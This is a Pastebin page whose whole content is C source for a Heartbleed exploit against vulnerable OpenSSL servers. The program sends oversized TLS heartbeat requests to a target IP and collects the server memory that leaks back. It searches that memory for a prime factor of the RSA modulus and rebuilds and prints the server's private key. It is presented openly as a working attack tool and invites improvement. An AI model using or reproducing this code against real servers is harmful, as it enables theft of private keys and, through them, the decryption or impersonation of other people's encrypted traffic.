API tools faq
paste
Advertisement
opexxx

heartbleed.c

opexxx
Apr 21st, 2015
395
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 6.01 KB | None | 0 0
raw download clone embed print report
  1. /* Heartbleed Private Key Exploit.
  2.  * Author: Felipe Osorio Thome.
  3.  * Date: july 1, 2014
  4.  * Brasil, Universidade de Sao Paulo - USP.
  5.  * Instituto de Ciencias Matematicas e Computacao - ICMC.
  6.  *
  7.  * This exploit is very simple. It is the main idea that matters.
  8.  * Feel free to improve it. */
  9.  
  10. #include <stdio.h>
  11. #include <stdlib.h>
  12. #include <string.h>
  13. #include <errno.h>
  14. #include <netdb.h>
  15. #include <sys/socket.h>
  16. #include <openssl/ssl.h>
  17.  
  18. #define DEFAULT_PORT 443
  19. #define DEFAULT_TRIES 10000
  20.  
  21. #define fatal(expression) do{ \
  22.     if(expression) { \
  23.         fprintf(stderr, "%d: %s\n", __LINE__, strerror(errno)); \
  24.         exit(EXIT_FAILURE); \
  25.     } \
  26. } while(0)
  27.  
  28. /* This macros (n2s and s2n) is copied from ssl/ssl_locl.h. */
  29. #define n2s(c,s)((s=(((unsigned int)(c[0]))<< 8)| \
  30.         (((unsigned int)(c[1]))    )),c+=2)
  31.  
  32. #define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), \
  33.     c[1]=(unsigned char)(((s)    )&0xff)),c+=2)
  34.  
  35. typedef struct {
  36.   int socket;
  37.   SSL *ssl_handle;
  38.   SSL_CTX *ssl_context;
  39. } CONN;
  40.  
  41. int tcp_connect(char *host, unsigned int port) {
  42.   int sockfd;
  43.   struct sockaddr_in sa;
  44.  
  45.   fatal( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0 );
  46.  
  47.   sa.sin_family = AF_INET;
  48.   sa.sin_port = htons(port);
  49.   sa.sin_addr.s_addr = inet_addr(host);
  50.   memset(&sa.sin_zero, 0, sizeof(sa.sin_zero));
  51.  
  52.   fatal( connect(sockfd, (struct sockaddr *) &sa, sizeof(struct sockaddr)) < 0 );
  53.  
  54.   return sockfd;
  55. }
  56.  
  57. void ssl_init() {
  58.   SSL_library_init();
  59.   SSL_load_error_strings();
  60. }
  61.  
  62. CONN *ssl_connect(char *host, unsigned int port) {
  63.   CONN *c = NULL;
  64.   BIO *sbio = NULL;
  65.  
  66.   fatal( !(c = malloc(sizeof(CONN))) );
  67.  
  68.   c->socket = tcp_connect(host, port);
  69.  
  70.   if( !(c->ssl_context = SSL_CTX_new(SSLv23_client_method())) ) ERR_print_errors_fp (stderr);
  71.   if( !(c->ssl_handle = SSL_new(c->ssl_context)) ) ERR_print_errors_fp (stderr);
  72.  
  73.   sbio = BIO_new_socket(c->socket, BIO_NOCLOSE);
  74.   SSL_set_bio(c->ssl_handle, sbio, sbio);
  75.  
  76.   if( SSL_connect(c->ssl_handle) != 1 ) ERR_print_errors_fp (stderr);
  77.  
  78.   return c;
  79. }
  80.  
  81. void bleed(CONN *c) {
  82.   unsigned char *buf = NULL, *p = NULL;
  83.  
  84.   if( !(buf = OPENSSL_malloc(3)) ) {
  85.     fprintf(stderr, "%d: %s Problem allocating memory.\n", __LINE__, strerror(errno));
  86.   }
  87.   else {
  88.     p = buf;
  89.     *p++ = TLS1_HB_REQUEST;
  90.     s2n(0xffff,p);
  91.  
  92.     ssl3_write_bytes(c->ssl_handle, TLS1_RT_HEARTBEAT, buf, 3);
  93.  
  94.     OPENSSL_free(buf);
  95.   }
  96. }
  97.  
  98. unsigned char *get_data(CONN *c) {
  99.   unsigned char *buf = NULL;
  100.  
  101.   SSL_read(c->ssl_handle, buf, 0);
  102.  
  103.   unsigned char *p = &c->ssl_handle->s3->rrec.data[0], *pl;
  104.   unsigned short hbtype;
  105.   unsigned int payload;
  106.   hbtype = *p++;
  107.   n2s(p, payload);
  108.  
  109.   if(hbtype == TLS1_HB_RESPONSE) {
  110.     fatal( !(buf = OPENSSL_malloc(payload)) );
  111.     memcpy(buf, p, payload);
  112.   }
  113.  
  114.   return buf;
  115. }
  116.  
  117. RSA *gen_key(BIGNUM *n, BIGNUM *e, BIGNUM *p, BIGNUM *q) {
  118.   RSA *rsa_pvtkey = NULL;
  119.   BN_CTX *ctx = NULL;
  120.   BIGNUM *tmp = NULL, *r0 = NULL, *r1 = NULL, *r2 = NULL;
  121.  
  122.   if( !(rsa_pvtkey = RSA_new()) ) goto err;
  123.   if( !(ctx = BN_CTX_new()) ) goto err;
  124.   BN_CTX_start(ctx);
  125.   r0 = BN_CTX_get(ctx);
  126.   r1 = BN_CTX_get(ctx);
  127.   r2 = BN_CTX_get(ctx);
  128.  
  129.   if( !(rsa_pvtkey->n = BN_dup(n)) ) goto err;
  130.   if( !(rsa_pvtkey->e = BN_dup(e)) ) goto err;
  131.   if( !(rsa_pvtkey->p = BN_dup(p)) ) goto err;
  132.   if( !(rsa_pvtkey->q = BN_dup(q)) ) goto err;
  133.   if( !(rsa_pvtkey->d = BN_new()) ) goto err;
  134.   if( !(rsa_pvtkey->dmp1 = BN_new()) ) goto err;
  135.   if( !(rsa_pvtkey->dmq1 = BN_new()) ) goto err;
  136.   if( !(rsa_pvtkey->iqmp = BN_new()) ) goto err;
  137.  
  138.   if(BN_cmp(rsa_pvtkey->p, rsa_pvtkey->q) < 0) {
  139.     tmp = rsa_pvtkey->p;
  140.     rsa_pvtkey->p = rsa_pvtkey->q;
  141.     rsa_pvtkey->q = tmp;
  142.   }
  143.  
  144.   if( !BN_sub(r1, rsa_pvtkey->p, BN_value_one()) ) goto err;
  145.   if( !BN_sub(r2, rsa_pvtkey->q, BN_value_one()) ) goto err;
  146.   if( !BN_mul(r0, r1, r2, ctx) ) goto err;
  147.   if( !BN_mod_inverse(rsa_pvtkey->d, rsa_pvtkey->e, r0, ctx) ) goto err;
  148.  
  149.   if( !BN_mod(rsa_pvtkey->dmp1, rsa_pvtkey->d, r1, ctx) ) goto err;
  150.  
  151.   if( !BN_mod(rsa_pvtkey->dmq1, rsa_pvtkey->d, r2, ctx) ) goto err;
  152.  
  153.   if( !BN_mod_inverse(rsa_pvtkey->iqmp, rsa_pvtkey->q, rsa_pvtkey->p, ctx) ) goto err;
  154.  
  155.   err:
  156.   if(!rsa_pvtkey) {
  157.     fprintf(stderr, "An error occur while creating RSA struct.\n");
  158.   }
  159.   if(ctx) {
  160.     BN_CTX_end(ctx);
  161.     BN_CTX_free(ctx);
  162.   }
  163.  
  164.   return rsa_pvtkey;
  165. }
  166.  
  167. RSA *get_key(CONN *c, unsigned char *data) {
  168.   int i, payload = 65535, prime_size = 64;
  169.   X509 *peer = NULL;
  170.   EVP_PKEY *pkey = NULL;
  171.   RSA *rsa_pubkey = NULL, *rsa_pvtkey = NULL;
  172.   unsigned char *data_inv = NULL;
  173.  
  174.   peer = SSL_get_peer_certificate(c->ssl_handle);
  175.   pkey = X509_get_pubkey(peer);
  176.   rsa_pubkey = pkey->pkey.rsa;
  177.  
  178.   if( !(data_inv = OPENSSL_malloc(payload)) ) goto err;
  179.   for(i = 0; i < payload; i++) {
  180.     data_inv[i] = data[payload - (i + 1)];
  181.   }
  182.  
  183.   BIGNUM *n = rsa_pubkey->n;
  184.   BIGNUM *e = rsa_pubkey->e;
  185.   BIGNUM *prime = BN_new();
  186.   BIGNUM *dv = BN_new();
  187.   BIGNUM *rem = BN_new();
  188.   BN_CTX *ctx = BN_CTX_new();
  189.  
  190.   for(i = 0; i < (payload - prime_size); i++) {
  191.     BN_bin2bn(data_inv + i, prime_size, prime);
  192.  
  193.     if(!BN_is_zero(prime) && !BN_is_one(prime) && BN_cmp(n, prime)) {
  194.       BN_div(dv, rem, n, prime, ctx);
  195.  
  196.       if(BN_is_zero(rem)) {
  197.         rsa_pvtkey = gen_key(n, e, prime, dv);
  198.       }
  199.     }
  200.   }
  201.  
  202.   err:
  203.   if(ctx) BN_CTX_free(ctx);
  204.   if(rem) BN_free(rem);
  205.   if(data_inv) OPENSSL_free(data_inv);
  206.  
  207.   return rsa_pvtkey;
  208. }
  209.  
  210. int main(int argc, char **argv) {
  211.   int i;
  212.   unsigned char *data = NULL;
  213.   RSA *rsa_pvtkey = NULL;
  214.  
  215.   if(argc <= 1) {
  216.     fprintf(stderr, "You need enter the target IP.\n");
  217.     exit(EXIT_FAILURE);
  218.   }
  219.  
  220.   ssl_init();
  221.   CONN *c = ssl_connect(argv[1], DEFAULT_PORT);
  222.  
  223.   for(i = 0; i < DEFAULT_TRIES; i++) {
  224.     bleed(c);
  225.     data = get_data(c);
  226.  
  227.     if(data) {
  228.       rsa_pvtkey = get_key(c, data);
  229.  
  230.       if(rsa_pvtkey) {
  231.         RSA_print_fp(stdout, rsa_pvtkey, 0);
  232.         break;
  233.       }
  234.     }
  235.   }
  236.  
  237.   if(data) OPENSSL_free(data);
  238.   if(rsa_pvtkey) RSA_free(rsa_pvtkey);
  239.   if(c) free(c);
  240.  
  241.   return 0;
  242. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!